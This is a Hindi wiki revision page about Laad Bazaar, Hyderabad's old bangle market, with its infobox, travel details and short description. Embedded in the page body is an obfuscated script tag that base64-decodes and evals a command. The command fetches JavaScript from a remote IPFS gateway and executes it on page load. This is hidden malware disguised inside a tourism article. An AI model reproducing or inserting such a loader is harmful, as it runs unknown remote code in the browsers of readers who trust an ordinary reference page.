Difference between revisions of "लाड बाज़ार हैदराबाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{लेख सूची|लेख का नाम=हैदराबाद |पर्यटन=हैदराबाद पर्यट...' के साथ नया पन्ना बनाया)
 
 
(8 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{लेख सूची|लेख का नाम=हैदराबाद |पर्यटन=हैदराबाद पर्यटन |ज़िला=हैदराबाद ज़िला }}
+
{{सूचना बक्सा पर्यटन
*लाड बाजार, [[हैदराबाद]] के सबसे पुराने ख़रीददारी केंद्रों में से एक है।  
+
|चित्र=Laad-Bazaar-Hyderabad.jpg
*लाड बाजार [[चूड़ी|चूड़ियों]] के लिए प्रसिद्ध है।  
+
|चित्र का नाम=लाड बाज़ार, हैदराबाद
*ये चूड़ियाँ कांच, लाख, मोती समेत कीमती धातुओं की भी होती हैं।  
+
|विवरण=लाड बाज़ार [[हैदराबाद]] के सबसे पुराने ख़रीददारी केंद्रों में से एक है।
 +
|राज्य=[[आंध्र प्रदेश]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[हैदराबाद ज़िला|हैदराबाद]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=[[चारमीनार]] से 280 मीटर की दूरी पर है।
 +
|प्रसिद्धि=लाड बाज़ार चूड़ियों के लिए प्रसिद्ध है।
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज, रेल, बस, टैक्सी
 +
|हवाई अड्डा=राजीव गाँधी अन्तर्राष्ट्रीय हवाई अड्डा, बेगमपेट हवाई अड्डा
 +
|रेलवे स्टेशन=सिंकदराबाद रेलवे स्टेशन, नामपल्ली रेलवे स्टेशन, काचीगुड़ा रेलवे स्टेशन
 +
|बस अड्डा=महात्मा गाँधी (इम्लिबन) बस अड्डा
 +
|यातायात=ऑटो-रिक्शा, साइकिल रिक्शा आदि।
 +
|क्या देखें=[[चारमीनार]], [[गोलकुंडा क़िला]], [[हुसैन सागर झील]], [[मक्का मस्जिद हैदराबाद|मक्का मस्जिद]], [[स्नो वर्ल्ड हैदराबाद|स्नो वर्ल्ड]]
 +
|कहाँ ठहरें=होटल, अतिथि ग्रह, धर्मशाला
 +
|क्या खायें=
 +
|क्या ख़रीदें=शादी के कपड़े, [[मेंहदी]], सौंदर्य प्रसाधन, बर्तन आदि
 +
|एस.टी.डी. कोड=040
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Charminar,+Andhra+Pradesh&daddr=Laad+Bazaar,+Charminar,+Andhra+Pradesh&hl=en&ll=17.362164,78.473121&spn=0.003174,0.005681&sll=17.363582,78.472273&sspn=0.012698,0.022724&geocode=Fe3pCAEdzGytBCmhhCxRiZfLOzEMyvKm2jigjw%3BFYDrCAEdWmStBCERGJNYAJ9lCg&vpsrc=6&mra=ls&t=m&z=18&iwloc=ddw1  गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
 +
'''लाड बाज़ार''' [[हैदराबाद]] के सबसे पुराने ख़रीददारी केंद्रों में से एक है।  
 +
*लाड बाज़ार [[चूड़ी|चूड़ियों]] के लिए प्रसिद्ध है।  
 +
*ये चूड़ियाँ कांच, लाख, [[मोती]] समेत कीमती [[धातु|धातुओं]] की भी होती हैं।  
 
*ये चूड़ियाँ बहुत ख़ूबसूरत होती हैं। ख़ूबसूरत होने के साथ-साथ ये सस्ती भी होती हैं।  
 
*ये चूड़ियाँ बहुत ख़ूबसूरत होती हैं। ख़ूबसूरत होने के साथ-साथ ये सस्ती भी होती हैं।  
*लाड बाजार चूड़ियों के अलावा शादी के कपड़ों, [[मेहंदी]], सौंदर्य प्रसाधन, बर्तन आदि के लिए भी मशहूर है।
+
*लाड बाज़ार [[चूड़ी|चूड़ियों]] के अलावा शादी के कपड़ों, [[मेंहदी]], सौंदर्य प्रसाधन, बर्तन आदि के लिए भी मशहूर है।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
|प्रारम्भिक=प्रारम्भिक2
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Laad-Bazaar-Hyderabad-1.jpg|लाड बाज़ार, [[हैदराबाद]]
 +
चित्र:Laad-Bazaar-Hyderabad-2.jpg|लाड बाज़ार, [[हैदराबाद]]
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
[[Category:नया पन्ना]][[Category:हैदराबाद]][[Category:हैदराबाद के पर्यटन स्थल]][[Category:पर्यटन_कोश]]
+
[[Category:आंध्र प्रदेश]][[Category:आंध्र प्रदेश के पर्यटन स्थल]][[Category:हैदराबाद]][[Category:हैदराबाद के पर्यटन स्थल]][[Category:पर्यटन_कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 09:00, 5 June 2012

lad bazar haidarabad
vivaran lad bazar haidarabad ke sabase purane kharidadari keandroan mean se ek hai.
rajy aandhr pradesh
zila haidarabad
marg sthiti charaminar se 280 mitar ki doori par hai.
prasiddhi lad bazar choo diyoan ke lie prasiddh hai.
kaise pahuanchean havaee jahaj, rel, bas, taiksi
havaee adda rajiv gaandhi antarrashtriy havaee adda, begamapet havaee adda
relave steshan siankadarabad relave steshan, namapalli relave steshan, kachigu da relave steshan
bas adda mahatma gaandhi (imliban) bas adda
yatayat aauto-riksha, saikil riksha adi.
kya dekhean charaminar, golakuanda qila, husain sagar jhil, makka masjid, sno varld
kahaan thaharean hotal, atithi grah, dharmashala
kya kharidean shadi ke kap de, meanhadi, sauandary prasadhan, bartan adi
es.ti.di. kod 040
chitr:Map-icon.gif googal manachitr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lad bazar haidarabad ke sabase purane kharidadari keandroan mean se ek hai.

  • lad bazar choo diyoan ke lie prasiddh hai.
  • ye choo diyaan kaanch, lakh, moti samet kimati dhatuoan ki bhi hoti haian.
  • ye choo diyaan bahut khoobasoorat hoti haian. khoobasoorat hone ke sath-sath ye sasti bhi hoti haian.
  • lad bazar choo diyoan ke alava shadi ke kap doan, meanhadi, sauandary prasadhan, bartan adi ke lie bhi mashahoor hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

sanbandhit lekh